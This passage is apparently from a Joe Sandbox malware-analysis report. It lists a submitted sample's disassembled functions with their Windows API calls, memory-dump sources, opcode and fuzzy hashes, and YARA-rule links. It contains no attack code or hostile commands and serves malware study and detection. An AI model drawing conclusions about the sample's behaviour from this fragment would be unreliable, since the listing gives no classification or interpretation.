                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$Long$AttributesLayered
                                            • String ID:
                                            • API String ID: 2169480361-0
                                            • Opcode ID: ee9c09dbe931b08046d4651012a1a53f87fe22277c3a61dd80f6ebfaa6b031b5
                                            • Instruction ID: 2bb17ed446a36265e048971603f9b055c185cac0e538e6c7a33583badb93e409
                                            • Opcode Fuzzy Hash: ee9c09dbe931b08046d4651012a1a53f87fe22277c3a61dd80f6ebfaa6b031b5
                                            • Instruction Fuzzy Hash: DD11BE31345225AFDB44AB58DC09FBA7799FF85321F154219F91AC72E2CBB0AC008796
                                            Function 00858A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00858AE0
                                            • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00858AF2
                                            • accept.WSOCK32(00000000,00000000,00000000), ref: 00858AFF
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858B16
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLastacceptselect
                                            • String ID:
                                            • API String ID: 385091864-0
                                            • Opcode ID: bacdb1cf3ae78aabad865ac0cf19e17d9403e2dac80bca0659c2a8bebeb9207a
                                            • Instruction ID: 51e1a34b9ccd90d3f489893843d56114547d8126d3ad60c391eaf8aa5f70eb54
                                            • Opcode Fuzzy Hash: bacdb1cf3ae78aabad865ac0cf19e17d9403e2dac80bca0659c2a8bebeb9207a
                                            • Instruction Fuzzy Hash: 46216372A002249FC7119F69CC85A9EBBECFF49360F00816AF849E7291DB749A458F91
                                            Function 00840AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00841E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00840ABB,?,?,?,0084187A,00000000,000000EF,00000119,?,?), ref: 00841E77
                                              • Part of subcall function 00841E68: lstrcpyW.KERNEL32(00000000,?,?,00840ABB,?,?,?,0084187A,00000000,000000EF,00000119,?,?,00000000), ref: 00841E9D
                                              • Part of subcall function 00841E68: lstrcmpiW.KERNEL32(00000000,?,00840ABB,?,?,?,0084187A,00000000,000000EF,00000119,?,?), ref: 00841ECE
                                            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0084187A,00000000,000000EF,00000119,?,?,00000000), ref: 00840AD4
                                            • lstrcpyW.KERNEL32(00000000,?,?,0084187A,00000000,000000EF,00000119,?,?,00000000), ref: 00840AFA
                                            • lstrcmpiW.KERNEL32(00000002,cdecl,?,0084187A,00000000,000000EF,00000119,?,?,00000000), ref: 00840B2E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: lstrcmpilstrcpylstrlen
                                            • String ID: cdecl
                                            • API String ID: 4031866154-3896280584
                                            • Opcode ID: ade8ab62c781b47390bac7805d0abefcf8a64dcbdc33b8111d714434d37efc15
                                            • Instruction ID: 61f8b40aa2e038d286de1be25a03bcf9c8a0c62497e2a7f89e92f60fdd8d7711
                                            • Opcode Fuzzy Hash: ade8ab62c781b47390bac7805d0abefcf8a64dcbdc33b8111d714434d37efc15
                                            • Instruction Fuzzy Hash: 8E11E93A100309AFDB259F38DC45D7B77A8FF45364B80412AF906CB290EB719841CBA5
                                            Function 00832F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _free.LIBCMT ref: 00832FB5
                                              • Part of subcall function 0082395C: __FF_MSGBANNER.LIBCMT ref: 00823973
                                              • Part of subcall function 0082395C: __NMSG_WRITE.LIBCMT ref: 0082397A
                                              • Part of subcall function 0082395C: RtlAllocateHeap.NTDLL(00F20000,00000000,00000001,00000001,00000000,?,?,0081F507,?,0000000E), ref: 0082399F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AllocateHeap_free
                                            • String ID:
                                            • API String ID: 614378929-0
                                            • Opcode ID: 74b009f79c8095830b3c3578ace466dd265a24e01335b9a4664d69f80e3b2eb8
                                            • Instruction ID: 5f74497bec1527d8d66a244b6ed2cec68c6bbc5dcb54acef788a92990a295e42
                                            • Opcode Fuzzy Hash: 74b009f79c8095830b3c3578ace466dd265a24e01335b9a4664d69f80e3b2eb8
                                            • Instruction Fuzzy Hash: 82110632409626ABCF353B78BC14A6A3BA4FF90364F204525F849DA291DF30C9808BD1
                                            Function 0084058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 008405AC
                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008405C7
                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008405DD
                                            • FreeLibrary.KERNEL32(?), ref: 00840632
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                            • String ID:
                                            • API String ID: 3137044355-0
                                            • Opcode ID: 4f3d500f3bfe5b2e3d0bb80d15b9c1d7b36bf6fb5ae52fa0756dc1a14c7d0570
                                            • Instruction ID: 325d7f212772a8b7dba743d7b0f81cdc341ad7d0b33979c9fc519542b59d70f2
                                            • Opcode Fuzzy Hash: 4f3d500f3bfe5b2e3d0bb80d15b9c1d7b36bf6fb5ae52fa0756dc1a14c7d0570
                                            • Instruction Fuzzy Hash: 3221867190030DABDB209F98DC88ADBBBB8FF50304F01846AA616E6150DB74EA549F61
                                            Function 00846713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00846733
                                            • _memset.LIBCMT ref: 00846754
                                            • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 008467A6
                                            • CloseHandle.KERNEL32(00000000), ref: 008467AF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseControlCreateDeviceFileHandle_memset
                                            • String ID:
                                            • API String ID: 1157408455-0
                                            • Opcode ID: 9ef97da8bf60748d7729691f5b295b5a06a60f1964987ffe161a84ac0cac3bde
                                            • Instruction ID: 2cfd4ee24a34efce46a0f353e04dd321b6eb18329974cc33993a0fbe6823aee5
                                            • Opcode Fuzzy Hash: 9ef97da8bf60748d7729691f5b295b5a06a60f1964987ffe161a84ac0cac3bde
                                            • Instruction Fuzzy Hash: 5B110A769012287AE73067A9AC4DFABBBBCFF45724F10429AF504E71D0D2704E808B65
                                            Function 0083B1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0083AA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0083AA79
                                              • Part of subcall function 0083AA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0083AA83
                                              • Part of subcall function 0083AA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0083AA92
                                              • Part of subcall function 0083AA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 0083AA99
                                              • Part of subcall function 0083AA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0083AAAF
                                            • GetLengthSid.ADVAPI32(?,00000000,0083ADE4,?,?), ref: 0083B21B
                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 0083B227
                                            • HeapAlloc.KERNEL32(00000000), ref: 0083B22E
                                            • CopySid.ADVAPI32(?,00000000,?), ref: 0083B247
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                            • String ID:
                                            • API String ID: 4217664535-0
                                            • Opcode ID: 52908257b36a6be92758046e025077b5735da0b5e6931b0666e18826ef25faa6
                                            • Instruction ID: 5bc7187c02df1c790985aee75e03312baa972aa915f7dfe611d6e6dde48c56fe
                                            • Opcode Fuzzy Hash: 52908257b36a6be92758046e025077b5735da0b5e6931b0666e18826ef25faa6
                                            • Instruction Fuzzy Hash: BE116DB5A00205AFDB049F98DC85AAFB7A9FFC5314F14812EEA42D7250D735AE44DB90
                                            Function 0083B478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 0083B498
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0083B4AA
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0083B4C0
                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0083B4DB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend
                                            • String ID:
                                            • API String ID: 3850602802-0
                                            • Opcode ID: 7aef963f13494ecbab1d930adbfdfd935af0b0293c9f2ea2826f1e172ca9211f
                                            • Instruction ID: e3fa31700f943de50e5aaa706fb94500182f5b0c4893e973667d35f2640dc0a5
                                            • Opcode Fuzzy Hash: 7aef963f13494ecbab1d930adbfdfd935af0b0293c9f2ea2826f1e172ca9211f
                                            • Instruction Fuzzy Hash: EE115ABA900218FFDB11DFA8C981E9DBBB4FB48700F204091E604F7290D771AE10DB98
                                            Function 0081B55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0081B5A5
                                            • GetClientRect.USER32(?,?), ref: 0087E69A
                                            • GetCursorPos.USER32(?), ref: 0087E6A4
                                            • ScreenToClient.USER32(?,?), ref: 0087E6AF
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Client$CursorLongProcRectScreenWindow
                                            • String ID:
                                            • API String ID: 4127811313-0
                                            • Opcode ID: 8f42de0507a8cc9f3776a43da35366c82cfc1cc94e12b2f5863b7265a2d02bf0
                                            • Instruction ID: 0dcf6ef9808921afb252a056d87c6e057301579e4ac0c196384cd9538050f0a3
                                            • Opcode Fuzzy Hash: 8f42de0507a8cc9f3776a43da35366c82cfc1cc94e12b2f5863b7265a2d02bf0
                                            • Instruction Fuzzy Hash: 34113671900129BFCB10DF98D885DEE77BDFF19304F000455E901E7141E330AA91CBA1
                                            Function 0084732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00847352
                                            • MessageBoxW.USER32(?,?,?,?), ref: 00847385
                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0084739B
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008473A2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                            • String ID:
                                            • API String ID: 2880819207-0
                                            • Opcode ID: d10f9fb5b5abd6514900c54a26e89dbccd35101fc47b00705b62a210d2b4e090
                                            • Instruction ID: d4c2aefa83b324080e1b01cb55d55d46464f78432ea2df0c0d93442254a6eb57
                                            • Opcode Fuzzy Hash: d10f9fb5b5abd6514900c54a26e89dbccd35101fc47b00705b62a210d2b4e090
                                            • Instruction Fuzzy Hash: 5711E172A04218BBCB019FAC9C09E9E7BA9FB48311F148215F921D33A1D7708D009BA1
                                            Function 0081D17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0081D1BA
                                            • GetStockObject.GDI32(00000011), ref: 0081D1CE
                                            • SendMessageW.USER32(00000000,00000030,00000000), ref: 0081D1D8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CreateMessageObjectSendStockWindow
                                            • String ID:
                                            • API String ID: 3970641297-0
                                            • Opcode ID: c70cfce160d4a69e090370d347153f8b3ff1d62ca1c589a9c45857b72618103c
                                            • Instruction ID: 3f4f833e2bf4cef9935c9143bd776a175b91b4063caec9ce349c1b783d284212
                                            • Opcode Fuzzy Hash: c70cfce160d4a69e090370d347153f8b3ff1d62ca1c589a9c45857b72618103c
                                            • Instruction Fuzzy Hash: F911ADB2101609BFEF125F949C54EEABB6DFF18368F044102FA0492050C731DCA0ABA0
                                            Function 00834DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                            • String ID:
                                            • API String ID: 3016257755-0
                                            • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                            • Instruction ID: ecd87df8d19fe6be4dda1f3269907f7631fa4a9ca9bb1e942881292974cea69f
                                            • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                            • Instruction Fuzzy Hash: E2014C7200014EBBCF126E88DC018EE3F23FB98365F589455FE1899131D336EAB1AB81
                                            Function 00827452 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00827A0D: __getptd_noexit.LIBCMT ref: 00827A0E
                                            • __lock.LIBCMT ref: 0082748F
                                            • InterlockedDecrement.KERNEL32(?), ref: 008274AC
                                            • _free.LIBCMT ref: 008274BF
                                            • InterlockedIncrement.KERNEL32(00F32AD0), ref: 008274D7
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                            • String ID:
                                            • API String ID: 2704283638-0
                                            • Opcode ID: 911e8b6b371546e6bfe8ad37a5a12aadff6cfa783a969555787dbb5ac94aded4
                                            • Instruction ID: ac866ac20e7abedca50fa8c714dccda93d7a0426992349717f05e2d46b16859f
                                            • Opcode Fuzzy Hash: 911e8b6b371546e6bfe8ad37a5a12aadff6cfa783a969555787dbb5ac94aded4
                                            • Instruction Fuzzy Hash: 94015E32905631ABD715BF6AB80975DBBA0FF08710F144109E815E7790D7246981CBDB
                                            Function 00827A94 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • __lock.LIBCMT ref: 00827AD8
                                              • Part of subcall function 00827CF4: __mtinitlocknum.LIBCMT ref: 00827D06
                                              • Part of subcall function 00827CF4: EnterCriticalSection.KERNEL32(00000000,?,00827ADD,0000000D), ref: 00827D1F
                                            • InterlockedIncrement.KERNEL32(?), ref: 00827AE5
                                            • __lock.LIBCMT ref: 00827AF9
                                            • ___addlocaleref.LIBCMT ref: 00827B17
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                            • String ID:
                                            • API String ID: 1687444384-0
                                            • Opcode ID: 4070f91720f37f173edd02880c69374f0fe5411b18702138a1c32e10b5a10f79
                                            • Instruction ID: 9432922b41bd483265ca4be2db4ba147c0bd243c28762c6a46352cff57cae979
                                            • Opcode Fuzzy Hash: 4070f91720f37f173edd02880c69374f0fe5411b18702138a1c32e10b5a10f79
                                            • Instruction Fuzzy Hash: D9015B75504B109FD7209F7AE90674AB7E0FF50321F20890EA49AD62A0DB74A684CB42
                                            Function 0086E32E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • _memset.LIBCMT ref: 0086E33D
                                            • _memset.LIBCMT ref: 0086E34C
                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C3D00,008C3D44), ref: 0086E37B
                                            • CloseHandle.KERNEL32 ref: 0086E38D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: _memset$CloseCreateHandleProcess
                                            • String ID:
                                            • API String ID: 3277943733-0
                                            • Opcode ID: d5bd0339b2aa8cc6cb5cf1d7746d731db9d63d4bf1ae72bcb9c5053d8778a6d7
                                            • Instruction ID: a3ad89ea2873f089fc6a794a445e6a160ac49161808be10f431d9590f694f3c5
                                            • Opcode Fuzzy Hash: d5bd0339b2aa8cc6cb5cf1d7746d731db9d63d4bf1ae72bcb9c5053d8778a6d7
                                            • Instruction Fuzzy Hash: 5CF05EF1541314BAE2102BA4BC45FB77E7CFB04754F008421BF0AE62A2D3759E0187A9
                                            Function 0080EE0D Relevance: 6.0, APIs: 4, Instructions: 34windowtimeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • timeGetTime.WINMM ref: 0080EBFA
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0080ED9F
                                            • TranslateMessage.USER32(?), ref: 008759F7
                                            • DispatchMessageW.USER32(?), ref: 00875A05
                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00875A19
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Message$DispatchTimeTranslatetime
                                            • String ID:
                                            • API String ID: 953213773-0
                                            • Opcode ID: c71cf2e18401ac7d67a721674c05c318134c351ff571bc9cbd1fb713564af524
                                            • Instruction ID: 9896fc50e043a3fd2fa6dd6e45c677fa78584c3bb9121c7cd61a246d43451a4f
                                            • Opcode Fuzzy Hash: c71cf2e18401ac7d67a721674c05c318134c351ff571bc9cbd1fb713564af524
                                            • Instruction Fuzzy Hash: 4EF08C3260938DEAE720C6E4EC09F9A779CFB54711F108C23A70EE6080EA71940587B2
